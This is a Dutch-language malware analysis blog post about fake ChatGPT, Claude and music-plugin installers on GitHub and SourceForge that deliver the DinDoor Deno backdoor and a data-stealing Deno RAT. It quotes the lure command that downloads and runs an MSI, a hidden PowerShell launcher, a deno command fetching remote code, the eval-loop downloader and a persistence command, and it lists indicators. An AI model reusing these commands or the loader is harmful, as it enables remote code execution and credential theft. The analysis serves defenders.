Oplichting, dreigingsinformatie

Nepsoftware op GitHub en SourceForge verspreidt Deno RAT 

door Gabriele Orini | 26 mei 2026
Een wolf in schaapskleren

Tijdens onze activiteiten op het gebied van dreigingsdetectie hebben we op GitHub en SourceForge valse installatieprogramma’s en plug-ins aangetroffen die zich voordoen als populaire software, waaronder ChatGPT, Claude, AutoTune en Kontakt, en die een Deno-achterdeur verspreiden die bekendstaat als DinDoor. Aanvallers maken gebruik van gehackte YouTube om links naar deze platforms te verspreiden. 

DinDoor installeert uiteindelijk verschillende soorten malware, waaronder een onopvallende Trojan voor toegang op afstand (RAT), die ook gebruikmaakt van de Deno JavaScript-runtime.  

Aanvallers maken steeds vaker misbruik van alternatieve JavaScript-runtimes zoals Bun en Deno om traditionele detectiemethoden te omzeilen. In een van onze recente onderzoeken hebben we vastgelegd hoe aanvallers Bun gebruiken als eerste infectievector om NWHStealer te verspreiden. En in maart constateerden ThreatDown ook dat aanvallers Deno gebruikten om CastleLoader te verspreiden via een meerfasige infectieketen waarbij het ClickFix-lokmiddel werd ingezet.  

Deze campagnes maken gebruik van Scoop (een alternatief installatieprogramma voor Windows) en WinGet (de officiële Windows ) om Deno op de computer van het slachtoffer te installeren. Vervolgens gebruiken ze de Deno-runtime om een RAT uit te voeren die in staat is om aanvullende payloads uit te voeren en gegevens uit browsers, wallets en andere applicaties te stelen. Deze RAT beschikt over een opmerkelijke peer-to-peer-functie die Edge gebruikt Edge schadelijk verkeer te verbergen. 

Legitieme platforms die worden misbruikt om malware te verspreiden

In de meeste geanalyseerde gevallen wordt de infectieketen meestal in gang gezet viaMSI-bestandenofPowerShell-scriptsdie van GitHub of SourceForge zijn gedownload. Gebruikers worden doorgaans via gehackteYouTube naar deze kwaadaardige repositories doorgestuurd. Deze video’s zijn momenteel in totaal meer dan 50.000 keer bekeken. 

Gecompromitteerde YouTube met door AI gegenereerde video's 
GecompromitteerdeYouTube met door AI gegenereerde video's 

De gehackte YouTube plaatsen berichten waarin verschillende software wordt aangeprezen en wisselen voortdurend van GitHub-account om de malware te verspreiden. 

YouTube die naar de kwaadaardige GitHub-repositories linken
YouTube die naar de schadelijke GitHub-repositories linken

De valse software lijkt gericht te zijn op contentmakers, AI-liefhebbers, gamers en technisch onderlegde gebruikers die eerder geneigd zijn om niet-officiële tools, gekraakte software of door de community verspreide installatieprogramma’s te downloaden van sites als GitHub en SourceForge. We hebben valse MSI's en scripts waargenomen die zich voordoen als installatieprogramma's en plug-ins voor legitieme software en merken zoals ChatGPT, Claude, ZENOLOGY, Ableton Live, AutoTune en Kontakt. 

GitHub-repository voor nep-installatieprogramma voor ChatGPT
GitHub-repository voor nep-installatieprogramma voor ChatGPT 

De kwaadaardige repositories bevatten een commando voor zowel Windows macOS. Deze repositories vragen gebruikers om de terminal te openen en een kwaadaardig commando te kopiëren, waarmee het MSI-bestand van GitHub wordt gedownload en uitgevoerd. 

Nep-plug-in die de gebruiker vraagt om de schadelijke opdracht te kopiëren en uit te voeren 
Nep-plug-in die de gebruiker vraagt om de schadelijke opdracht te kopiëren en uit te voeren 

Kwaadwillende GitHub-accounts maken meerdere repositories aan die vol staan met nepsoftware en plug-ins die verband houden met populaire software, om zo meer gebruikers te lokken. 

GitHub-account met verschillende schadelijke repositories
GitHub-account met verschillende schadelijke repositories

We hebben ontdekt dat dezelfde achterdeur via SourceForge werd verspreid, waarbij deze zich voordeed als legitieme spelsoftware genaamd GearUP en als AI-software voor het verwijderen van watermerken genaamd BWR. 

De schadelijke MSI-bestanden die op SourceForge worden gehost

Hoe blijf ik veilig  

De aanvallers maakten sterk gebruik van het vertrouwen van gebruikers. GitHub en SourceForge zijn legitieme platforms, waardoor valse projecten er overtuigender uitzien. We hebben contact opgenomen met GitHub, dat de schadelijke repositories snel heeft verwijderd, maar gebruikers moeten er rekening mee houden dat er steeds weer nieuwe zullen opduiken.

Hier zijn een paar eenvoudige manieren om veilig te blijven:  

  • Download software alleen van de officiële websites van de leveranciers.  
  • Wees op je hoede voor „gratis“, gekraakte of onofficiële versies van betaalde software. 
  • Wees voorzichtig met downloads van GitHub, SourceForge, forums of sites voor het delen van bestanden, vooral als deze afkomstig zijn van nieuwe of onbekende accounts. 
  • Aanvallers blijven nieuwe profielen aanmaken om deze malware via verschillende platforms te verspreiden. Controleer het profiel van de ontwikkelaar of uitgever, de reputatie ervan en hoe lang geleden het is aangemaakt voordat je iets downloadt. 
  • Controleer of de inhoud van het archief, de afbeeldingen en de tekstbestanden overeenkomen met wat u verwachtte te downloaden. De namen en structuren van archieven volgen vaak herkenbare schadelijke patronen.  
  • Controleer de uitgever en de digitale handtekening van het bestand voordat u het uitvoert. Windows kunt u dit meestal controleren door met de rechtermuisknop op het bestand te klikken en vervolgens Eigenschappen > Digitale handtekeningen te selecteren. Houd er rekening mee dat een geldige handtekening geen garantie is dat een bestand veilig is, maar ontbrekende of verdachte handtekeningen zijn vaak een waarschuwing. 

Technische analyse 

De kwaadaardige GitHub-repositories vragen de gebruiker om cmd te openen en een kwaadaardige opdracht uit te voeren. De kwaadaardige opdrachten downloaden een MSI-bestand van GitHub en installeren dit via msiexec. Deze repositories bevatten soms ook PowerShell-scripts om op dezelfde manier de infectieketen in gang te zetten. 

Voorbeeld van een schadelijke opdracht op GitHub die de infectieketen in gang zet: 

curl -Lo %temp%\s.msi https://raw.githubusercontent.com/claude-free-plugin/install/main/install.msi && msiexec /i %temp%\s.msi 

De MSI plaatst een CMD-bestand en een PowerShell-script in een willekeurige map die in de MSI is opgegeven InstallationFolder en registerwaarden. We hebben verschillende structuren voor deze MSI’s vastgesteld, waarbij JavaScript in plaats van het CMD-bestand werd gebruikt, of waarbij extra bestanden waren ingebed.

De bestanden „Ps1File“ en „CmdFile“ in de MSI-dropper
De bestanden „Ps1File“ en „CmdFile“ in de MSI-dropper

Het CMD-bestand voert het PowerShell-script uit, waarvan de naam varieert in de geanalyseerde infectieketens: 

@set "SCRIPTDIR=%~dp0" @powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Start-Process powershell -ArgumentList ('-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File ""' + $env:SCRIPTDIR + '{Random name}.ps1""') -WindowStyle Hidden" 

Het uitgevoerde PowerShell-script
Het uitgevoerde PowerShell-script

Het PowerShell-script zorgt voor: 

  • Controleer of de pakketbeheerder Scoop is geïnstalleerd en installeer deze indien nodig met het officiële script van get.scoop.sh. Scoop is een populair, open-source installatieprogramma en pakketbeheerder voor de opdrachtregel voor Microsoft Windows. 
  • Gebruik Scoop om WinGet (Windows Manager) te installeren als dit ontbreekt.  
  • Installeert Deno (een JavaScript/TypeScript-runtime) via WinGet of Scoop als het nog niet aanwezig is.

Het gebruik van de pakketbeheerders Scoop en WinGet om extra software op de gehackte computer te installeren, is een interessante aanpak die de aanvaller meer flexibiliteit biedt. 

Het commando dat is uitgevoerd om Deno via WinGet te installeren: 

"C:\Users\admin\scoop\apps\winget\current\winget.exe" install --id DenoLand.Deno -e --accept-source-agreements --accept-package-agreements --silent

De DinDoor-achterdeur 

Vervolgens wordt de volgende stap uitgevoerd met het gedownloade Deno-uitvoerbare bestand: 

"C:\Users\admin\AppData\Local\Microsoft\WinGet\Packages\DenoLand.Deno_Microsoft.Winget.Source_8wekyb3d8bbwe\deno.exe" run -A http://{C2}/{random_path}.js

De geretourneerde code (met de interne naam „launcher-1“) is een kleine eval-loop-functie die de volgende fase downloadt (met de interne naam „launcher-2“). De gedownloade backdoor staat algemeen bekend alsDinDoor

var a="{C2}".split(","),i=0;for(;;){let e=null;try{let t=await fetch(a[i%a.length]+"/{BUILD_ID}.js");if(!t.ok)throw 0;e=await t.text()}catch{i++,await new Promise(t=>setTimeout(t,5e3));continue}try{await(0,eval)("(async()=>{"+e+"})()")}catch{}await new Promise(t=>setTimeout(t,3e4))}

De backdoor zorgt voor de persistentie, stuurt informatie over het geïnfecteerde systeem naar de command-and-control-server (C2) en voert aanvullende payloads en opdrachten uit die door de C2 worden teruggestuurd. De HTTP-eindpunten die voor de C2-communicatie worden gebruikt, verschillen per geanalyseerd geval.  

De achterdeur haalt een ID op via een HTTP-eindpunt (bijvoorbeeld, /security-pool) en gebruikt die ID vervolgens om de volgende fase op te halen uit /v2{ID}.js.   

De verkregen fase wordt uitgevoerd via stdin zonder dat er naar de schijf wordt geschreven, met behulp van het commando: 

deno run -A --no-check –

Om persistentie te bereiken, voert de achterdeur een PowerShell-opdracht uit om een RUN-sleutel aan te maken die de eerder gebruikte downloader „launcher-1“ uitvoert: 

conhost.exe --headless "<deno.exe>" -A "%APPDATA%\<hash>.js

In de onderzochte gevallen verspreidt deze backdoor verschillende malwarefamilies. In deze blog analyseren we een van de verspreide payloads: een RAT die gebruikmaakt van de Deno JavaScript-runtime. 

Deno RAT 

De geleverde RAT maakt, net als de andere geanalyseerde scripts, gebruik van de Deno JavaScript-omgeving en beschikt over alle benodigde functionaliteit om het apparaat te besturen, opdrachten en payloads uit te voeren en diverse soorten gegevens te exfiltreren via de ingebouwde stealer-module.  

We hebben geen specifieke naam of toeschrijving voor deze RAT kunnen vinden. In het verleden werd de RAT aangeduid als „Smokest“, op basis van een specifieke waarde in het configuratiebestand. De vergelijkbare stijl van commentaar en de gedeelde infrastructuur wijzen erop dat de ontwikkelaar van DinDoor en de ontwikkelaar van de RAT mogelijk dezelfde persoon of hetzelfde team zijn. 

Heb je iets meegenomen wat je beter niet had kunnen meenemen?

Naast HTTP voor C2-communicatie ondersteunt de RAT ook WebSocket communicatie, ingeschakeld wanneer de JSON-waarde isLiveEnabled de waarde van 'returned from the C2' is ingesteld op 'true'. 

De belangrijkste functie van de Deno RAT
De belangrijkste functie van de Deno RAT

De RAT ondersteunt verschillende commando's (exec, exec-ps, exec-sc, sysinfo, screenshot, stealer) en functionaliteit: 

  • Verzamel systeeminformatie over het gehackte apparaat 
  • Volledige bidirectionele bediening via een aangepaste VNC-implementatie via WebSocket 
  • Richt je op meer dan 50 extensies voor cryptowallets en 10 mappen met cryptosoftware, zoals Atomic Wallet, Exodus, Electrum en ByteCoin
  • Verzamel gegevens van browsers zoals Chrome, Chromium, Brave, Edge, Avast Browser, Edge, Opera, Vivaldi, CentBrowser, Kometa, Orbitum, 360Browser en Chromodo 
  • Gegevens uit Telegram, Discord en Lightcord exfiltreren 
  • Gegevens uit het klembord opslaan en wijzigen  
  • Mappen en bestanden weergeven en inhoud uit bestanden met specifieke extensies exfiltreren  
  • Maak schermafbeeldingen op verschillende manieren  
  • Extra taken uitvoeren  
  • Willekeurige processen starten of beëindigen  
  • Commando’s uitvoeren met PowerShell  
  • SOCKS5-proxytunnels opzetten via WebSocket 

Een van de interessantste aspecten van de RAT is een peer-to-peer-streamingmodus die gebruikmaakt van de Edge om het verkeer te verbergen en detectie te bemoeilijken.

Om live videobeelden rechtstreeks naar de operator te streamen zonder deze via de C2-server te leiden, start de RAT een verborgen Edge en maakt hiermee verbinding via Chrome Protocol (CDP). Vervolgens injecteert het een kleine WebRTC-HTML-pagina in Edge, waardoor de legitieme browser wordt omgevormd tot een peer-to-peer-videorelay. De Deno-agent legt het scherm van het slachtoffer vast en codeert het in H.264, stuurt de frames via CDP door naar de Edge en Edge ze rechtstreeks Edge naar de browser van de operator via een versleuteld WebRTC DataChannel. SDP- en ICE-signalering, die nodig is om de directe verbinding tot stand te brengen, wordt uitgewisseld via de bestaande C2 WebSocket. 

De ingevoegde HTML-pagina in Edge
De ingevoegde HTML-pagina in Edge  

De RAT maakt gebruik van de volgende eindpunten voor C2-communicatie, die per exemplaar kunnen verschillen: 

  • /health: controleert het „ok“-antwoord van de C2 
  • /token: ontvangst van configuratieparameters, uitvoering van taken, resultaten en geëxfiltreerde gegevens 
  • /vnc/agent/: WebSocket-pad dat wordt gebruikt voor VNC-communicatie 

De configuratiegegevens zijn Base64-gecodeerd en worden bij de communicatie met de C2 als autorisatietoken verzonden. Gedecodeerde configuratiegegevens: 

{ 

  "buildId": "cd361ef3159f5ce9", 

  "buildNote": "BWR", 

  "buildType": "msi-v2", 

  "proxyUrls": ["{C2}"], 

  "userId": "…", 

  "accessTokenHash": "…", 

  "iat": 1779372546, 

  "exp": 2094948546 

}

We hebben verschillende versies van deze RAT aangetroffen, waaronder een ‘light’-versie met de naam ‘agent-lite’, die slechts een beperkt aantal commando’s ondersteunt en gebruikmaakt van Cloudflare Workers voor C2-communicatie. 

De „light“-versie van de RAT
De „light“-versie van de RAT

 

Dankwoord 

Indicatoren van compromissen (IOC's) 

URL's 

  • https[:]//github.com/claude-free-plugin/
  • https[:]//github.com/ai-gen-profi 
  • https[:]//github.com/wharfdemolisherpit 
  • https[:]//sourceforge.net/projects/gearup/ 
  • https[:]//sourceforge.net/projects/bluewaveremover/

Domeinen 

  • claudescript[.]top: distributiewebsite 
  • ms-telemetry-gateway-us[.]com: C2 
  • dakatawebstick[.]com: C2 
  • ashpaltlonpro[.]com: C2 
  • cf-proxy[.]cloud-analytics-services[.]workers.dev: C2 
  • agilemast3r[.]duckdns[.]org: C2 
  • geralnewlong[.]com: C2 
  • hngfbgfbfb[.]cyou: C2 
  • logicalnewrestore[.]com: C2

IP's 

  • 23[.]227[.]196[.]107: C2 
  • 45[.]137[.]99[.]121: C2 
  • 31[.]57[.]129[.]23: C2 
  • 66[.]78[.]40[.]107: C2 
  • 193[.]233[.]198[.]132: C2

We rapporteren niet alleen over bedreigingen - we verwijderen ze ook

Cyberbeveiligingsrisico's mogen zich nooit verder verspreiden dan een krantenkop. Houd bedreigingen van uw apparaten door Malwarebytes vandaag nog te downloaden.

Over de auteur

Gabriele Orini

Gabriele is een malware-onderzoeker die dol is op het bestrijden van malware. Als hij dat niet doet, geniet hij van de natuur, kunst en dieren.

LAATSTE ARTIKELEN

Insecten
ClickFix bootst Windows na

Meer dan 700 websites op het gebied van onderwijs en technologie zijn gekaapt tijdens een grootschalige ClickFix-malwarecampagne

Mei 26, 2026

Hackers misbruik van een kwetsbaarheid in het Ghost CMS om valse Cloudflare-verificatiepagina’s weer te geven, waarmee ze gebruikers ertoe aanzetten hun eigen pc’s te infecteren.

Nieuws
week in veiligheid

Een week in de beveiliging (mei 18 – mei 24)

Mei 25, 2026

Een overzicht van de onderwerpen die we in de week van 18 tot en met 24 mei 2026 hebben behandeld

Insecten
Chrome logo

Werk Chrome bij: door kritieke fouten kunnen aanvallers mogelijk code uitvoeren

Mei 22, 2026

Deze Chrome verhelpt kritieke kwetsbaarheden die aanvallers via kwaadaardige websites zouden kunnen misbruiken, maar niet de kwetsbaarheid in „Browser Fetch“.

Gerelateerde artikelen

Pictogram medewerkers

Medewerkers

Pictogram Bedreigingscentrum

Bedreigingscentrum

Pictogram Podcasts

Podcast

Woordenlijst

Woordenlijst

Pictogram Zwendel

Oplichting